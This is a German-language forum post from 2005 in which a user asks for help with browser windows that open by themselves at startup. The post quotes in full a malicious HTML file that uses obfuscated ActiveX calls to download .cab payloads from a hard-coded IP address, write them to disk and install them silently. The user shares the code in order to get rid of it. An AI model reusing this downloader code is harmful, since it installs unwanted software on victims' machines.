| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Trojaner oder andere Schädlinge...Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
11.05.2005, 23:58
| #1 |
| |  Trojaner oder andere Schädlinge... Hi Leute! Ich hab jetzt die letzten 2 Stunden damit verbracht, das Netz zu begoogeln und bin dennoch zu keinem Ergebnis gekommen. Mein Problem ist, dass beim Start von Windows sich 2x der Firefox öffnet mit 2 lokalen .htm Dateien. Die eine heisst windows.htm, die andere update.htm. Ich habe bereits versucht, sie zu löschen, doch sie sind beim nächsten booten wieder da. Ich habe ausserdem bitdefender, spybot s&d, spysweeper und xp-antispy (was aber glaub nix dazu sagt) ausprobiert, alles ohne wirklichen Erfolg. Habe auch schon mit tuneup alles unnötige aus dem Autostart entfernt, aber zu meinem Trojaner/Virus/Wurm/... hat es nix gesagt... Ich poste mal den Inhalt der windows.htm, welche die meines Erachtens nach die üblere der beiden ist, da die andere Seite bloss ein "File not found" faked und die windows.htm versucht auf die Platte zu schreiben. Also hier der Code der windows.htm: Code:
ATTFilter <HTML>
<HEAD>
<SCRIPT>
cust='6'
antivir='0';
mt='0';
lc='0';
function dl(u) {
try {
eval("x = new Activ"+"eXObject('Mic"+"rosoft.XM"+"LHTTP')");
x.Open("GET",u,0);
x.Send();
eval("s = new Activ"+"eXObject('ADOD"+"B.Stream')");
eval("s.M"+"ode = 3");
eval("s.T"+"ype = 1");
eval("s.O"+"pen()");
eval("s.W"+"rite(x.responseBody)");
eval('s.S'+'aveToFile("C:\\\\x.cab",2)');
}
catch(ex) { }
}
dl('http://216.74.97.200/~techno/files/explorer'+cust+'.cab');
</SCRIPT>
<META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=i codeBase=c:/x.cab
classid=clsid:11111111-1111-1111-1111-511111114362></OBJECT>
<SCRIPT>
dl('http://216.74.97.200/~techno/files/777.cab');
</SCRIPT>
<OBJECT id=i codeBase=c:/x.cab
classid=clsid:11111111-1111-1111-1111-511111114362></OBJECT>
<SCRIPT>
if (antivir == 0 && mt == 0) {
dl('http://216.74.97.200/~techno/files/MediaTicketsInstaller.cab');
num = new Array(13);
num[0] = "4362";
num[1] = "4362";
num[2] = "4362";
num[3] = "4362";
num[4] = "4362";
num[5] = "4362";
num[6] = "4362";
num[7] = "4362";
num[8] = "4362";
num[9] = "4362";
num[10] = "4362";
num[11] = "4362";
num[12] = "4362";
idN = Math.floor(Math.random() * num.length);
document.write('<OBJECT ID="MediaTicketsInstallerDemo" WIDTH=0 HEIGHT=0 CLASSID="CLSID:9EB320CE-BE1D-4304-A081-4B466'+'5414BEF" CODEBASE="c:/x.cab"><PARAM NAME="rid" VALUE='+num[idN]+'></OBJECT>');
}
</SCRIPT>
</BODY>
</HTML>
Danke schonmal im Voraus! Grüßle, der Christian |
| Themen zu Trojaner oder andere Schädlinge... |
| autostart, bitdefender, booten, code, defender, entfernt, ergebnis, file, firefox, found, hijack, hijackthis, html, leute, löschen, not, platte, problem, script, seite, spybot, start, start von windows, trojaner, windows, öffnet |
Baum-Darstellung